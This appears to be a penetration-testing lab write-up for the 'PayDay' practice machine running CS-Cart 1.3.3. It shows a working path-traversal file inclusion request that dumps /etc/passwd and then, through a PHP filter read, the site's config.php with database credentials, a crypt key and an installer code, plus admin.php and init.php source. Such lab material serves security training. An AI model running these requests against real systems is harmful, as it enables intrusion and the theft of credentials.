LFI
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ curl -s http://$IP/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
dovecot:x:104:111:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
postfix:x:105:112::/var/spool/postfix:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
<br />
<b>Fatal error</b>: Class 'PHPMailer' not found in <b>/var/www/classes/phpmailer/class.cs_phpmailer.php</b> on line <b>6</b><br />The target CS-Cart instance is 1.3.3, suffering from multiple vulnerabilities. One of them, LFI, has been confirmed
patrick is a valid system user
File Read via PHP Filter
/Practice/PayDay/3-Exploitation/attachments/{565AB1B0-1D2B-41E8-B67B-AE6315E27A4D}.png)
Attempting to read one of the endpoints via the PHP filter method fails.
This is because the inclusion is made from the /var/www/classes/phpmailer directory
config.php
/Practice/PayDay/3-Exploitation/attachments/{3FFEC0F1-CB1E-426E-AB17-AC7E37CF0E98}-1.png)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/payday]
└─$ echo [...REDACTED...] | base64 -d
<?php
//
// $Id: config.php 1822 2006-05-17 16:44:43Z
//
if ( !defined('IN_CSCART') ) { die('Access denied'); }
$db_host = 'localhost';
$db_name = 'cscart';
$db_user = 'root';
$db_password = 'root';
// Example:
// Your url is http://www.yourcompany.com/store/cscart
// cscart_http_host = 'www.yourcompany.com';
// cscart_http_dir = '/store/cscart';
//
// Your secure url is https://secure.yourcompany.com/secure_dir/cscart
// cscart_https_host = 'secure.yourcompany.com';
// cscart_https_dir = '/secure_dir/cscart';
// Host and directory where cs-cart is installed on usual server
$cscart_http_host = '192.168.116.39';
$cscart_http_dir = '';
// Host and directory where cs-cart is installed on secure server
$cscart_https_host = '192.168.116.39';
$cscart_https_dir = '';
$admin_index = 'admin.php';
$customer_index = 'index.php';
$image_index = 'image.php';
$target_name = 'target';
$mode_name = 'mode';
$action_name = 'action';
// DEMO mode
$demo_mode_enabled = false;
// Trial mode
$trial_mode = false;
error_reporting(0);
//
// Load local config data
//
@include_once($cscart_dir . DS . 'local_conf.php');
//
// Directory definitions
//
// Filesystem paths
$core_dir = $cscart_dir . DS . 'core' . DS;
$classes_dir = $cscart_dir . DS . 'classes' . DS;
$addons_dir = $cscart_dir . DS . 'addons' . DS;
$skins_dir = $cscart_dir . DS . 'skins' . DS;
$common_dir = $cscart_dir . DS . 'include' . DS . 'common' . DS;
$admin_dir = $cscart_dir . DS . 'include' . DS . 'admin' . DS;
$targets_dir = $cscart_dir . DS . 'targets'.DS;
$customer_dir = $cscart_dir . DS . 'include' . DS . 'customer' . DS;
$payment_files_dir = $cscart_dir . DS . 'payments' . DS;
$shipping_files_dir = $cscart_dir . DS . 'shippings' . DS;
$var_dir = array();
$var_dir['log'] = $cscart_dir . DS .'var' . DS . 'log' . DS;
$var_dir['compiled'] = $cscart_dir . DS .'var' . DS . 'compiled' . DS;
$var_dir['database'] = $cscart_dir . DS .'var' . DS . 'database' . DS;
$var_dir['downloads'] = $cscart_dir . DS .'var' . DS . 'downloads' . DS;
$var_dir['upgrade'] = $cscart_dir . DS .'var' . DS . 'upgrade' . DS;
require $core_dir . DS . 'https_detect.php';
// Define host directory depending on the current connection
$cscart_host_dir = (defined('HTTPS')) ? $cscart_https_dir : $cscart_http_dir;
// Directory for store images on file system
$images_storage_dir = $cscart_dir . DS .'images' . DS;
$images_storage_web_dir = $cscart_host_dir.'/images/';
// Web paths
$skins_rel_dir = 'skins/'; // Used for web path
//
// Database tables aliases...
//
$db_tables = array(
'categories' => 'cscart_categories',
'category_descriptions' => 'cscart_category_descriptions',
'category_images' => 'cscart_category_images',
'category_images_links' => 'cscart_category_images_links',
'currencies' => 'cscart_currencies',
'currency_descriptions' => 'cscart_currency_descriptions',
'common_images' => 'cscart_common_images',
'common_images_links' => 'cscart_common_images_links',
'detailed_images' => 'cscart_detailed_images',
'products' => 'cscart_products',
'product_descriptions' => 'cscart_product_descriptions',
'products_categories' => 'cscart_products_categories',
'product_prices' => 'cscart_product_prices',
'products_taxes' => 'cscart_products_taxes',
'users' => 'cscart_users',
'user_profiles' => 'cscart_user_profiles',
'sessions' => 'cscart_sessions',
'product_images' => 'cscart_product_images',
'product_images_links' => 'cscart_product_images_links',
'languages' => 'cscart_languages',
'language_values' => 'cscart_language_values',
'memberships' => 'cscart_memberships',
'membership_descriptions' => 'cscart_membership_descriptions',
'states' => 'cscart_states',
'state_descriptions' => 'cscart_state_descriptions',
'orders' => 'cscart_orders',
'order_details' => 'cscart_order_details',
'taxes' => 'cscart_taxes',
'tax_descriptions' => 'cscart_tax_descriptions',
'tax_rates' => 'cscart_tax_rates',
'shippings' => 'cscart_shippings',
'shipping_descriptions' => 'cscart_shipping_descriptions',
'shipping_rates' => 'cscart_shipping_rates',
'discounts' => 'cscart_discounts',
'discount_descriptions' => 'cscart_discount_descriptions',
'discounts_categories' => 'cscart_discounts_categories',
'discounts_users' => 'cscart_discounts_users',
'discounts_products' => 'cscart_discounts_products',
'destination_descriptions' => 'cscart_destination_descriptions',
'destinations' => 'cscart_destinations',
'destination_elements' => 'cscart_destination_elements',
'countries' => 'cscart_countries',
'country_descriptions' => 'cscart_country_descriptions',
'payments' => 'cscart_payments',
'payment_descriptions' => 'cscart_payment_descriptions',
'payment_processors' => 'cscart_payment_processors',
'common_descriptions' => 'cscart_common_descriptions',
'settings' => 'cscart_settings',
'settings_sections' => 'cscart_settings_sections',
'settings_subsections' => 'cscart_settings_subsections',
'settings_routines' => 'cscart_settings_routines',
'settings_elements' => 'cscart_settings_elements',
'settings_descriptions' => 'cscart_settings_descriptions',
'settings_variants' => 'cscart_settings_variants',
'topics' => 'cscart_topics',
'topic_descriptions' => 'cscart_topic_descriptions',
'pages' => 'cscart_pages',
'page_descriptions' => 'cscart_page_descriptions',
'pages_topics' => 'cscart_pages_topics',
'ekeys' => 'cscart_ekeys',
'sitemap_links' => 'cscart_sitemap_links',
'sitemap_sections' => 'cscart_sitemap_sections',
'static_data' => 'cscart_static_data',
'static_data_descriptions' => 'cscart_static_data_descriptions',
'statistics_element_descriptions' => 'cscart_statistics_element_descriptions',
'statistics_elements' => 'cscart_statistics_elements',
'statistics_interval_descriptions' => 'cscart_statistics_interval_descriptions',
'statistics_intervals' => 'cscart_statistics_intervals',
'statistics_reports' => 'cscart_statistics_reports',
'statistics_report_descriptions' => 'cscart_statistics_report_descriptions',
'statistics_tables' => 'cscart_statistics_tables',
'statistics_table_descriptions' => 'cscart_statistics_table_descriptions',
'statistics_table_conditions' => 'cscart_statistics_table_conditions',
'statistics_table_elements' => 'cscart_statistics_table_elements',
'statistics_table_element_conditions' => 'cscart_statistics_table_element_conditions',
'product_options' => 'cscart_product_options',
'product_options_descriptions' => 'cscart_product_options_descriptions',
'product_options_exceptions' => 'cscart_product_options_exceptions',
'product_option_variants' => 'cscart_product_option_variants',
'product_option_variants_descriptions' => 'cscart_product_option_variants_descriptions',
'product_options_inventory' => 'cscart_product_options_inventory',
'product_global_option_links' => 'cscart_product_global_option_links',
'new_orders' => 'cscart_new_orders',
'product_features' => 'cscart_product_features',
'product_features_values' => 'cscart_product_features_values',
'product_features_variants_descriptions' => 'cscart_product_features_variants_descriptions',
'product_features_descriptions' => 'cscart_product_features_descriptions',
'forms' => 'cscart_forms',
'form_elements' => 'cscart_form_elements',
'form_element_variants' => 'cscart_form_element_variants',
'form_descriptions' => 'cscart_form_descriptions',
'shipping_services' => 'cscart_shipping_services',
'shipping_service_descriptions' => 'cscart_shipping_service_descriptions',
'membership_privileges' => 'cscart_membership_privileges',
'privileges' => 'cscart_privileges',
'privilege_descriptions' => 'cscart_privilege_descriptions',
);
//
// Default targets
//
$script_targets = array (
'categories' => $targets_dir.'categories.php',
'products' => $targets_dir.'products.php',
'cart' => $targets_dir.'cart.php',
'help' => $targets_dir.'help.php',
'index' => $targets_dir.'index.php',
'auth' => $targets_dir.'auth.php',
'profiles' => $targets_dir.'profiles.php',
'languages' => $targets_dir.'languages.php',
'settings' => $targets_dir.'settings.php',
'settings_dev' => $targets_dir.'settings_dev.php',
'states' => $targets_dir.'states.php',
'shippings' => $targets_dir.'shippings.php',
'discounts' => $targets_dir.'discounts.php',
'checkout' => $targets_dir.'checkout.php',
'orders' => $targets_dir.'orders.php',
'taxes' => $targets_dir.'taxes.php',
'memberships' => $targets_dir.'memberships.php',
'destinations' => $targets_dir.'destinations.php',
'countries' => $targets_dir.'countries.php',
'payments' => $targets_dir.'payments.php',
'tools' => $targets_dir.'tools.php',
'html_catalog' => $targets_dir.'html_catalog.php',
'topics' => $targets_dir.'topics.php',
'pages' => $targets_dir.'pages.php',
'sitemap' => $targets_dir.'sitemap.php',
'exceptions' => $targets_dir.'exceptions.php',
'search' => $targets_dir.'search.php',
'statistics' => $targets_dir.'statistics.php',
'static_data' => $targets_dir.'static_data.php',
'product_options' => $targets_dir.'product_options.php',
'file_browser' => $targets_dir.'file_browser.php',
'client_env' => $targets_dir.'client_env.php',
'payment_notification' => $targets_dir.'payment_notification.php',
'wishlist' => $targets_dir.'wishlist.php',
'template_editor' => $targets_dir.'template_editor.php',
'product_features' => $targets_dir.'product_features.php',
'index_page' => $targets_dir.'index_page.php',
'upgrade_center' => $targets_dir.'upgrade_center.php',
'skin_selector' => $targets_dir.'skin_selector.php',
'forms' => $targets_dir.'forms.php',
'my_account' => $targets_dir.'my_account.php',
'currencies' => $targets_dir.'currencies.php',
'order_management' => $targets_dir.'order_management.php',
'logs' => $targets_dir.'logs.php',
);
//
// Check if logging is enabled
//
if (file_exists($var_dir['log'].'settings.php')) {
include $var_dir['log'].'settings.php';
}
if (defined('LOG_PHP_EVENTS')) {
ini_set("log_errors", 1);
if (!file_exists($var_dir['log'].'php_events_'.date("Y-m-d").'.log.php')) {
$fd = @fopen($var_dir['log'].'php_events_'.date("Y-m-d").'.log.php', 'w');
@fwrite($fd, "<?php die(); ?>\n");
@fclose($fd);
}
ini_set("error_log", $var_dir['log'].'php_events_'.date("Y-m-d").'.log.php');
ini_set("ignore_repeated_errors", 1);
}
$http_location = "http://$cscart_http_host".$cscart_http_dir;
$https_location = "https://$cscart_https_host".$cscart_https_dir;
$current_location = (defined('HTTPS')) ? $https_location : $http_location;
// BlowFish key
$crypt_key = 'YOURSVERYSECRETKEY';
// Database layer
$db_type = 'mysql';
// Set the session name
// C - for customer area
// A - for admin area
// The different session names for areas allows you to
// log in as customer and admin in one browser instance
$CSCART_SESSION_NAMES = array('C' => 'csid', 'A' => 'acsid');
// List of file extensions which the uploaded or renamed via admin area
// file can not has.
$forbidden_file_extensions = array (
'php',
'php3',
'pl',
'com',
'exe',
'bat',
'cgi'
);
// Uncomment this line if you experience problems with mysql5 server
//define('MYSQL5', true);
// Authentication code to access the installator
$AUTH_CODE = '1YTRKM2U';
define('CSCART_VERSION', '1.3.3');
?>Successfully fetched and decoded the config.php file;
root:rootfor DBYOURSVERYSECRETKEYis the hashing key1YTRKM2Uis the code for installator
admin.php
/Practice/PayDay/3-Exploitation/attachments/{587D85CD-DC0A-43F9-BA73-1EB57CAF0D55}.png)
/Practice/PayDay/3-Exploitation/attachments/{919303B7-401E-486D-969A-48419DC89D57}.png)
<?php
//
// $Id: admin.php 1462 2006-03-17 12:39:35Z zeke $
//
DEFINE ('AREA', 'A');
DEFINE ('AREA_NAME' ,'admin');
require './prepare.php';
require './init.php';
$index_script = $admin_index;
if ($settings['General']['secure_admin'] == 'Y' ) {
fn_https_redirect($https_location.'/'.$current_url);
}
if (!empty($auth['user_id']) && $auth['area'] != AREA) {
$auth = array();
fn_redirect($index_script);
}
if (empty($target) && empty($auth['user_id'])) {
$target = 'index';
} elseif (empty($target) && !empty($auth['user_id'])) {
$target = 'statistics';
}
//
// Common includes
//
include $common_dir.'admin_common.php';
fn_add_breadcrumb(fn_get_lang_var('home'), $index_script);
//
// Target that allow access without logging in
//
$trusted_targets = array (
'index' => true,
'auth' => true,
);
if (empty($auth['user_id']) && !isset($trusted_targets[$target])) {
sess_register('redirect_url');
$redirect_url = $current_url;
fn_set_notification('E', fn_get_lang_var('access_denied'), fn_get_lang_var('error_not_logged'));
fn_redirect("$index_script?$target_name=auth&$mode_name=login_form");
}
//
// Include target script from $script_targets array
//
if (file_exists($script_targets[$target])) {
include $script_targets[$target];
} else {
fn_set_exception('no_page');
}
$smarty->assign('index_script', $index_script);
fn_show_template('index.tpl',$smarty, true);
?>N/A
init.php
/Practice/PayDay/3-Exploitation/attachments/{E35A11ED-264C-42F2-A2E5-8B95DED12E68}.png)
/Practice/PayDay/3-Exploitation/attachments/Pasted-image-20250209145208.png)
<?php
//
// $Id: init.php 1806 2006-05-17 11:59:31Z
//
if ( !defined('IN_CSCART') ) { die('Access denied'); }
// Require configuration
require_once($cscart_dir .DS. 'config.php');
if (isset($_GET['version'])) {
die('CS-CART: version <b>'.CSCART_VERSION.'</b>');
}
// Require core functions
require_once($core_dir.'fn_compat.php');
require_once($core_dir."db_{$db_type}.php");
require_once($core_dir.'fn_database.php');
require_once($core_dir.'fn_users.php');
require_once($core_dir.'fn_catalog.php');
require_once($core_dir.'fn_cms.php');
require_once($core_dir.'fn_cart.php');
require_once($core_dir.'fn_locations.php');
require_once($core_dir.'fn_common.php');
require_once($core_dir.'fn_classes_initializers.php');
require_once($core_dir.'fn_statistics.php');
// Clean up templates cache
if (isset($_GET['cleanup_cache'])) {
echo "Cache cleanup... ";
$res = fn_rm($var_dir['compiled'], false);
die($res == true? "<b style='color: green;'>OK</b>" : "<b style='color: red;'>FAILED</b>");
}
// Require HTTPS functions
require_once($core_dir.'https.php');
// Require tests functions
require_once($core_dir.'tests.php');
// Check if software is installed
if ($db_host == '%DB_HOST%') {
die('The cart is <b>not installed</b>. Please click here to start installation process: <a href="install.php">[install]</a>');
}
// Connect to database
$db_conn = db_initiate($db_host, $db_user, $db_password, $db_name);
if (!$db_conn) {
fn_error(debug_backtrace(), "Cannot connect to the database server", false);
}
if (defined('MYSQL5')) {
db_query("set @@sql_mode=''");
}
// Build cart settings array
if ($_result = db_query("SELECT option_name, value, section_id, subsection_id, option_type FROM $db_tables[settings] WHERE is_global='Y'")) {
while($_row = db_fetch_array($_result)) {
if (!empty($_row['subsection_id'])) {
if ($_row['option_type'] == 'M' || $_row['option_type'] == 'N') {
parse_str($_row['value'], $settings[$_row['section_id']][$_row['subsection_id']][$_row['option_name']]);
} else {
$settings[$_row['section_id']][$_row['subsection_id']][$_row['option_name']] = $_row['value'];
}
} elseif (!empty($_row['section_id'])) {
if ($_row['option_type'] == 'M' || $_row['option_type'] == 'N') {
parse_str($_row['value'], $settings[$_row['section_id']][$_row['option_name']]);
} else {
$settings[$_row['section_id']][$_row['option_name']] = $_row['value'];
}
} else {
$settings[$_row['option_name']] = $_row['value'];
}
}
db_free_result($_result);
unset($_row);
}
// Set the session name
$CSCART_SESSION_NAME = $CSCART_SESSION_NAMES[AREA];
//Start session mechanism
require($core_dir.'sessions.php');
// select the skin to display
include $core_dir . 'skins.php';
// initialize templater
fn_init_templater();
// initialize store language
include $core_dir . 'languages.php';
if (!defined('NO_SESSION')) {
// Get descriptions for company country and state
if (!empty($settings['Company']['company_country'])) {
$settings['Company']['company_country_descr'] = fn_get_country_name($settings['Company']['company_country'], $cart_language);
}
if (!empty($settings['Company']['company_state'])) {
$settings['Company']['company_state_descr'] = fn_get_state_name($settings['Company']['company_state'], $settings['Company']['company_country'], $cart_language);
}
}
// Include addons
include $core_dir.'addons.php';
// Include notification reporting subsystem
include $core_dir.'notification.php';
// Include user information
include $core_dir.'user.php';
$target = isset($$target_name) ? $$target_name : '';
$mode = isset($$mode_name) ? $$mode_name : '';
$action = isset($$action_name) ? $$action_name : '';
$category_id = isset($category_id) ? $category_id : 0;
$topic_id = isset($topic_id) ? $topic_id : 0;
$product_id = isset($product_id) ? $product_id : 0;
$page_id = isset($page_id) ? $page_id : 0;
$page = isset($page) ? $page : 1;
$breadcrumbs = array();
$smarty->assign_by_ref('breadcrumbs', $breadcrumbs);
$temp_file_dir=$smarty->compile_dir;
// Plug for javascript detector. Don't edit!
$client_env['is_javascript'] = 'Y';
$smarty->assign('client_env', @$client_env);
// GET CLIENT IP
if (!defined('CONSOLE')) {
$REMOTE_ADDR = $_SERVER['REMOTE_ADDR'];
$smarty->assign('REMOTE_ADDR', $REMOTE_ADDR);
}
$QUERY_STRING = empty($QUERY_STRING) ? '' : $QUERY_STRING;
if (defined('SKINS_PANEL')) {
$smarty->assign('admin_skin', $admin_skin);
$smarty->assign('customer_skin', $customer_skin);
$smarty->assign('demo_mode_enabled', $demo_mode_enabled);
$smarty->assign('available_skins', $available_skins);
}
$smarty->assign_by_ref('settings', $settings);
// initialize store currency
include $core_dir . 'currencies.php';
$smarty->assign('CSCARTSESSNAME', $CSCART_SESSION_NAME);
$smarty->assign('CSCARTSESSID', @$GLOBALS[$CSCART_SESSION_NAME]);
// URL's assignments
$smarty->assign('http_location', $http_location);
$smarty->assign('https_location', $https_location);
$smarty->assign('cscart_dir', $cscart_dir);
$smarty->assign('current_location', $current_location);
$smarty->assign('QUERY_STRING', $QUERY_STRING);
$smarty->assign('cscart_host_dir', $cscart_host_dir);
$current_url = ((AREA == 'A') ? $admin_index : $customer_index) . ((!empty($QUERY_STRING)) ? '?'.$QUERY_STRING : '');
$smarty->assign('current_url', str_replace('&', '&', $current_url));
$smarty->assign('admin_index', $admin_index);
$smarty->assign('customer_index', $customer_index);
$smarty->assign('image_index', $image_index);
$smarty->assign('no_image_path', $no_image_path);
// Targets and their names assignments
$smarty->assign('target_name', $target_name);
$smarty->assign('mode_name', $mode_name);
$smarty->assign('action_name', $action_name);
$smarty->assign('target', @$target);
$smarty->assign_by_ref('mode', @$mode);
$smarty->assign_by_ref('action', @$action);
$smarty->assign('cart_language', @$cart_language);
$smarty->assign('skin_dir', $skin_dir);
$smarty->assign('skins_dir', $web_skins_dir);
$smarty->assign('demo_username', @$demo_username);
$smarty->assign('demo_password', @$demo_password);
if (AREA == 'A') {
$smarty->assign('users_online', $users_online);
}
// Smarty mail assignments
$smarty_mail->assign('settings', @$settings);
$smarty_mail->assign('http_location', $http_location);
$smarty_mail->assign('https_location', $https_location);
$smarty_mail->assign('current_location', $current_location);
$smarty_mail->assign('admin_index', $admin_index);
$smarty_mail->assign('customer_index', $customer_index);
$smarty_mail->assign('target_name', $target_name);
$smarty_mail->assign('mode_name', $mode_name);
$smarty_mail->assign('action_name', $action_name);
$order_status_descr = array ( // FIXME!!! Move this somewhere...
'O' => 'open',
'C' => 'completed',
'P' => 'processed',
'D' => 'declined',
'F' => 'failed',
'I' => 'cancelled',
'B' => 'backordered'
);
$smarty->assign('order_status_descr', $order_status_descr);
?>N/A